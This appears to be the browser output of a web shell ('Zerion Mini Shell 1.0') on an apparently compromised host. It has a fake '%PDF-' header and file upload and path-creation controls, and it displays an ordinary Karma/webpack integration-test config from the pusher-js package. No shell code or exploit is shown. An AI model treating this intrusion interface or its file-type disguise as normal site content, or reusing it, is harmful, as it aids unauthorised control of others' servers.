%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/ugotscom/bos_naturals/node_modules/pusher-js/spec/config/karma/
Upload File :
Create Path :
Current File : /home/ugotscom/bos_naturals/node_modules/pusher-js/spec/config/karma/config.integration.js

var objectAssign = require('object-assign-deep');
var webpack = require('webpack');
var commonConfig = require('./config.common');

module.exports = objectAssign({}, commonConfig, {
  files: [
    '**/spec/javascripts/integration/index.web.js'
  ],
  preprocessors: {
    '**/spec/javascripts/integration/index.web.js': ['webpack']
  },

  webpack: {
    resolve: {
      modules: ['spec/javascripts/helpers/web'],
      alias: {
        integration: 'web/integration'
      }
    },
    plugins: [
      new webpack.DefinePlugin({
        'process.env.MINIMAL_INTEGRATION_TESTS': JSON.stringify(process.env.MINIMAL_INTEGRATION_TESTS),
      })
    ],
  }
});

Zerion Mini Shell 1.0